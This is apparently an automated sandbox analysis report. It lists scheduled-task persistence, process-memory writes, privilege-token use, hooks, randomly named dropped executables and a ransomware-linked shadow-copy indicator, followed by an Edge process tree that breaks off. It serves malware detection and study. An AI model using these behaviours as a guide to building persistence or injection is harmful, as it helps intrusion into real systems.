Scheduled Task/Job: Scheduled Task 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2376	schtasks.exe
4484	schtasks.exe
4312	schtasks.exe
2540	schtasks.exe
3512	schtasks.exe
732	schtasks.exe
5780	schtasks.exe
2732	schtasks.exe
1276	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
984	msedge.exe
984	msedge.exe
2300	msedge.exe
2300	msedge.exe
4524	identity_helper.exe
4524	identity_helper.exe
1852	msedge.exe
1852	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
740	msedge.exe
740	msedge.exe
5024	msiexec.exe
5024	msiexec.exe
3628	msedge.exe
3628	msedge.exe
976	setup.exe
976	setup.exe
976	setup.exe
976	setup.exe
4220	setup.exe
4220	setup.exe
4220	setup.exe
4220	setup.exe
2344	UXEZ13dcixfxO3xLyNbEfiBU.exe
2344	UXEZ13dcixfxO3xLyNbEfiBU.exe
5608	MSBuild.exe
5608	MSBuild.exe
4568	towmbSBzenOBl3_jr7QhnVTj.exe
4568	towmbSBzenOBl3_jr7QhnVTj.exe
5760	msedge.exe
5760	msedge.exe
2936	powershell.exe
2936	powershell.exe
5540	powershell.exe
5540	powershell.exe
2936	powershell.exe
5076	RegAsm.exe
5076	RegAsm.exe
5540	powershell.exe
6120	RegAsm.exe
6120	RegAsm.exe
6120	RegAsm.exe
6120	RegAsm.exe
6120	RegAsm.exe
6120	RegAsm.exe
6120	RegAsm.exe
6120	RegAsm.exe
6120	RegAsm.exe
6120	RegAsm.exe
6120	RegAsm.exe
6120	RegAsm.exe
6120	RegAsm.exe
6120	RegAsm.exe
6120	RegAsm.exe
6120	RegAsm.exe
6120	RegAsm.exe
6120	RegAsm.exe
6120	RegAsm.exe
6120	RegAsm.exe
6120	RegAsm.exe
6120	RegAsm.exe

Suspicious behavior: LoadsDriver 4 IoCs

pid	Process
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 61 IoCs

pid	Process
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: 33	5168	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	5168	AUDIODG.EXE
Token: SeShutdownPrivilege	5288	msiexec.exe
Token: SeIncreaseQuotaPrivilege	5288	msiexec.exe
Token: SeSecurityPrivilege	5024	msiexec.exe
Token: SeCreateTokenPrivilege	5288	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	5288	msiexec.exe
Token: SeLockMemoryPrivilege	5288	msiexec.exe
Token: SeIncreaseQuotaPrivilege	5288	msiexec.exe
Token: SeMachineAccountPrivilege	5288	msiexec.exe
Token: SeTcbPrivilege	5288	msiexec.exe
Token: SeSecurityPrivilege	5288	msiexec.exe
Token: SeTakeOwnershipPrivilege	5288	msiexec.exe
Token: SeLoadDriverPrivilege	5288	msiexec.exe
Token: SeSystemProfilePrivilege	5288	msiexec.exe
Token: SeSystemtimePrivilege	5288	msiexec.exe
Token: SeProfSingleProcessPrivilege	5288	msiexec.exe
Token: SeIncBasePriorityPrivilege	5288	msiexec.exe
Token: SeCreatePagefilePrivilege	5288	msiexec.exe
Token: SeCreatePermanentPrivilege	5288	msiexec.exe
Token: SeBackupPrivilege	5288	msiexec.exe
Token: SeRestorePrivilege	5288	msiexec.exe
Token: SeShutdownPrivilege	5288	msiexec.exe
Token: SeDebugPrivilege	5288	msiexec.exe
Token: SeAuditPrivilege	5288	msiexec.exe
Token: SeSystemEnvironmentPrivilege	5288	msiexec.exe
Token: SeChangeNotifyPrivilege	5288	msiexec.exe
Token: SeRemoteShutdownPrivilege	5288	msiexec.exe
Token: SeUndockPrivilege	5288	msiexec.exe
Token: SeSyncAgentPrivilege	5288	msiexec.exe
Token: SeEnableDelegationPrivilege	5288	msiexec.exe
Token: SeManageVolumePrivilege	5288	msiexec.exe
Token: SeImpersonatePrivilege	5288	msiexec.exe
Token: SeCreateGlobalPrivilege	5288	msiexec.exe
Token: SeBackupPrivilege	6004	vssvc.exe
Token: SeRestorePrivilege	6004	vssvc.exe
Token: SeAuditPrivilege	6004	vssvc.exe
Token: SeBackupPrivilege	5024	msiexec.exe
Token: SeRestorePrivilege	5024	msiexec.exe
Token: SeRestorePrivilege	5024	msiexec.exe
Token: SeTakeOwnershipPrivilege	5024	msiexec.exe
Token: SeRestorePrivilege	5024	msiexec.exe
Token: SeTakeOwnershipPrivilege	5024	msiexec.exe
Token: SeRestorePrivilege	5024	msiexec.exe
Token: SeTakeOwnershipPrivilege	5024	msiexec.exe
Token: SeRestorePrivilege	5024	msiexec.exe
Token: SeTakeOwnershipPrivilege	5024	msiexec.exe
Token: SeRestorePrivilege	5024	msiexec.exe
Token: SeTakeOwnershipPrivilege	5024	msiexec.exe
Token: SeRestorePrivilege	5024	msiexec.exe
Token: SeTakeOwnershipPrivilege	5024	msiexec.exe
Token: SeRestorePrivilege	5024	msiexec.exe
Token: SeTakeOwnershipPrivilege	5024	msiexec.exe
Token: SeRestorePrivilege	5024	msiexec.exe
Token: SeTakeOwnershipPrivilege	5024	msiexec.exe
Token: SeRestorePrivilege	5024	msiexec.exe
Token: SeTakeOwnershipPrivilege	5024	msiexec.exe
Token: SeRestorePrivilege	5024	msiexec.exe
Token: SeTakeOwnershipPrivilege	5024	msiexec.exe
Token: SeRestorePrivilege	5024	msiexec.exe
Token: SeTakeOwnershipPrivilege	5024	msiexec.exe
Token: SeRestorePrivilege	5024	msiexec.exe
Token: SeTakeOwnershipPrivilege	5024	msiexec.exe
Token: SeRestorePrivilege	5024	msiexec.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
5288	msiexec.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe
2300	msedge.exe

Suspicious use of SetWindowsHookEx 23 IoCs

pid	Process
976	setup.exe
4220	setup.exe
5580	T0qJC09GvDEuSkMeGFLdaMFx.exe
6000	eIDDb3XYxvYHWrDy5a12tKEm.exe
4584	0bhjjDkdpE9G15ynZICCXL2r.exe
5936	xdMbQGthmM5A5ydjQA8PDq6k.exe
2344	UXEZ13dcixfxO3xLyNbEfiBU.exe
6104	bjWxSkKqXMR7odWAJEcWxhoj.exe
5700	CoqwRomIrFLLCP5o_FouY1Mj.exe
6000	eIDDb3XYxvYHWrDy5a12tKEm.exe
5500	CoqwRomIrFLLCP5o_FouY1Mj.tmp
1180	17XdHxjg4RYuOASnCjvnJ40P.exe
4552	v40EpIKMih9Aj2cY77veyjMv.exe
5608	MSBuild.exe
5528	MSBuild.exe
2576	Install.exe
6120	RegAsm.exe
112	Install.exe
3264	audiooutputswitcher.exe
2180	audiooutputswitcher.exe
5076	RegAsm.exe
5168	Install.exe
3136	Install.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2300 wrote to memory of 3020	2300	msedge.exe	84
PID 2300 wrote to memory of 3020	2300	msedge.exe	84
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 2924	2300	msedge.exe	85
PID 2300 wrote to memory of 984	2300	msedge.exe	86
PID 2300 wrote to memory of 984	2300	msedge.exe	86
PID 2300 wrote to memory of 3528	2300	msedge.exe	87
PID 2300 wrote to memory of 3528	2300	msedge.exe	87
PID 2300 wrote to memory of 3528	2300	msedge.exe	87
PID 2300 wrote to memory of 3528	2300	msedge.exe	87
PID 2300 wrote to memory of 3528	2300	msedge.exe	87
PID 2300 wrote to memory of 3528	2300	msedge.exe	87
PID 2300 wrote to memory of 3528	2300	msedge.exe	87
PID 2300 wrote to memory of 3528	2300	msedge.exe	87
PID 2300 wrote to memory of 3528	2300	msedge.exe	87
PID 2300 wrote to memory of 3528	2300	msedge.exe	87
PID 2300 wrote to memory of 3528	2300	msedge.exe	87
PID 2300 wrote to memory of 3528	2300	msedge.exe	87
PID 2300 wrote to memory of 3528	2300	msedge.exe	87
PID 2300 wrote to memory of 3528	2300	msedge.exe	87
PID 2300 wrote to memory of 3528	2300	msedge.exe	87
PID 2300 wrote to memory of 3528	2300	msedge.exe	87
PID 2300 wrote to memory of 3528	2300	msedge.exe	87
PID 2300 wrote to memory of 3528	2300	msedge.exe	87
PID 2300 wrote to memory of 3528	2300	msedge.exe	87
PID 2300 wrote to memory of 3528	2300	msedge.exe	87

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://turbobit.net
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcc63546f8,0x7ffcc6354708,0x7ffcc6354718
  2⤵
  PID:3020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2296 /prefetch:2
  2⤵
  PID:2924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2888 /prefetch:8
  2⤵
  PID:3528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
  2⤵
  PID:220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
  2⤵
  PID:3212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:1
  2⤵
  PID:848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2208 /prefetch:1
  2⤵
  PID:4852
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5856 /prefetch:8
  2⤵
  PID:3908
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5856 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:1
  2⤵
  PID:1244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4780 /prefetch:1
  2⤵
  PID:1120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:1
  2⤵
  PID:3148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:1
  2⤵
  PID:4744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6232 /prefetch:1
  2⤵
  PID:632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6236 /prefetch:1
  2⤵
  PID:1212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6132 /prefetch:1
  2⤵
  PID:2392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1316 /prefetch:1
  2⤵
  PID:1108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:1
  2⤵
  PID:1000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5976 /prefetch:8
  2⤵
  PID:264
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6252 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:1852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4808 /prefetch:1
  2⤵
  PID:3360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:1
  2⤵
  PID:1608
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:1
  2⤵
  PID:3248
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:1
  2⤵
  PID:1208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4936 /prefetch:8
  2⤵
  PID:472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6220 /prefetch:1
  2⤵
  PID:1036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2004 /prefetch:1
  2⤵
  PID:1828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4616 /prefetch:1
  2⤵
  PID:2012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:1
  2⤵
  PID:472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=212 /prefetch:1
  2⤵
  PID:3396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6340 /prefetch:1
  2⤵
  PID:3784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
